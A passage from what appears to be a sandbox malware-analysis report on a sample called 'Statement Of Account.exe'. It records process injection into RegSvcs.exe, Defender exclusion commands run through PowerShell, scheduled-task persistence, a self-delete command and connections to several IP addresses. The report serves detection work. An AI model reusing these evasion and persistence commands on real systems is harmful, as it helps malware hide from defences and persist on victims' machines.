          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6EA80 mov eax, dword ptr fs:[00000030h]8_2_00F6EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FECA72 mov eax, dword ptr fs:[00000030h]8_2_00FECA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FECA72 mov eax, dword ptr fs:[00000030h]8_2_00FECA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FACA6F mov eax, dword ptr fs:[00000030h]8_2_00FACA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FACA6F mov eax, dword ptr fs:[00000030h]8_2_00FACA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FACA6F mov eax, dword ptr fs:[00000030h]8_2_00FACA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80A5B mov eax, dword ptr fs:[00000030h]8_2_00F80A5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80A5B mov eax, dword ptr fs:[00000030h]8_2_00F80A5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024BB0 mov eax, dword ptr fs:[00000030h]8_2_01024BB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024BB0 mov eax, dword ptr fs:[00000030h]8_2_01024BB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F94A35 mov eax, dword ptr fs:[00000030h]8_2_00F94A35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F94A35 mov eax, dword ptr fs:[00000030h]8_2_00F94A35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101EBD0 mov eax, dword ptr fs:[00000030h]8_2_0101EBD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EA2E mov eax, dword ptr fs:[00000030h]8_2_00F9EA2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FACA24 mov eax, dword ptr fs:[00000030h]8_2_00FACA24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFCA11 mov eax, dword ptr fs:[00000030h]8_2_00FFCA11
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68A00 mov eax, dword ptr fs:[00000030h]8_2_00F68A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68A00 mov eax, dword ptr fs:[00000030h]8_2_00F68A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EBFC mov eax, dword ptr fs:[00000030h]8_2_00F9EBFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78BF0 mov eax, dword ptr fs:[00000030h]8_2_00F78BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78BF0 mov eax, dword ptr fs:[00000030h]8_2_00F78BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78BF0 mov eax, dword ptr fs:[00000030h]8_2_00F78BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFCBF0 mov eax, dword ptr fs:[00000030h]8_2_00FFCBF0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exe Network Connect: 154.12.38.29 80
          Source: C:\Windows\explorer.exe Network Connect: 34.149.87.45 80
          Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"
          Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"
          Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 2580
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 860000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: D0000
          Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
          Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
          Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6A4008
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CE9008
          Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"
          Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp"
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: explorer.exe, 00000009.00000000.1714538739.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000009.00000000.1707519329.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2938732437.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000009.00000000.1704959989.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
          Source: explorer.exe, 00000009.00000000.1707519329.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2938732437.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000009.00000000.1707519329.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2938732437.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Users\user\Desktop\Statement Of Account.exe VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
